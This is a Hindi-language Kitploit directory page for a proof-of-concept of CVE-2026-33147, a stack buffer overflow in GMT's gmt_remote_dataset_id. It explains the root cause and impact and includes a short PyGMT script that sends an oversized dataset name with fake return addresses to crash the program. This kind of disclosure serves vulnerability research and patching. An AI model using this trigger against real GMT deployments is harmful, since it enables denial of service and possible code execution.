Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-33147 — स्टैक-आधारित बफर ओवरफ्लो के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, GMT के gmt_remote_dataset_id में, जो क्राफ्टेड डेटासेट नामों के माध्यम से क्रैश और संभावित कोड निष्पादन को प्रदर्शित करता है। | Kitploit
उपकरण/GitHubGitHub/redyank/cve-2026-33147
भेद्यता विश्लेषणशोषणबाइनरी शोषण
GitHubredyank/cve-2026-33147

CVE-2026-33147

स्टैक-आधारित बफर ओवरफ्लो के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट, GMT के gmt_remote_dataset_id में, जो क्राफ्टेड डेटासेट नामों के माध्यम से क्रैश और संभावित कोड निष्पादन को प्रदर्शित करता है।

रिपॉजिटरी देखें
135 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2026-33147

CVE-2026-33147 (gmt_remote_dataset_id में स्टैक-आधारित बफर ओवरफ्लो)

सारांश

src/gmt_remote.c में gmt_remote_dataset_id फ़ंक्शन में एक स्टैक-आधारित बफर ओवरफ्लो भेद्यता की पहचान की गई थी। यह समस्या तब उत्पन्न होती है जब एक विशेष रूप से तैयार की गई लंबी स्ट्रिंग को डेटासेट पहचानकर्ता के रूप में पारित किया जाता है (उदाहरण के लिए, which मॉड्यूल के माध्यम से), जिससे क्रैश या संभावित मनमाना कोड निष्पादन हो सकता है।

विवरण

यह भेद्यता एक निश्चित आकार के स्टैक बफर file[PATH_MAX] में उपयोगकर्ता-नियंत्रित डेटासेट नाम की प्रतिलिपि बनाते समय strcpy (या समान असीमित स्ट्रिंग संचालन) के असुरक्षित उपयोग के कारण होती है।

  • संवेदनशील फ़ंक्शन: gmt_remote_dataset_id
  • संवेदनशील फ़ाइल: src/gmt_remote.c
  • मूल कारण: स्टैक बफर में प्रतिलिपि बनाने से पहले इनपुट लंबाई सत्यापन की कमी।

जब कोई इनपुट PATH_MAX (आमतौर पर 4096 बाइट्स) से अधिक हो जाता है, तो यह रिटर्न एड्रेस सहित स्टैक फ्रेम को अधिलेखित कर देता है। इसकी पुष्टि AddressSanitizer (ASan) का उपयोग करके की गई थी, जिसने स्टैक-बफर-ओवरफ्लो की सूचना दी थी।

PoC

PyGMT का उपयोग करने वाली निम्नलिखित Python स्क्रिप्ट क्रैश को पुन: उत्पन्न करती है:

root@kitploit:~
import struct
from pygmt.clib import Session

with Session() as lib:
    # स्टैक बफर को ओवरफ्लो करने के लिए डिज़ाइन किया गया पेलोड
    padding = "A" * 4096
    fake_ret = struct.pack("<Q", 0x4141414141414141) * 100
    payload = padding + fake_ret.decode("latin-1")
    
    # 'which' मॉड्यूल के माध्यम से ओवरफ्लो को ट्रिगर करें
    lib.call_module("which", [payload])

प्रभाव

यह एक मेमोरी सुरक्षा भेद्यता है।

  • प्रभावित कौन है: कोई भी उपयोगकर्ता या एप्लिकेशन जो C API या PyGMT जैसे उच्च-स्तरीय इंटरफेस के माध्यम से GMT का उपयोग करता है और अविश्वसनीय डेटासेट नामों को संसाधित करता है।
  • परिणाम: न्यूनतम रूप से, यह प्रोग्राम क्रैश के माध्यम से सेवा से इनकार (DoS) का कारण बनता है। कुछ वातावरणों में, इसका संभावित रूप से मनमाना कोड निष्पादन के लिए शोषण किया जा सकता है।
टूल डाउनलोड करें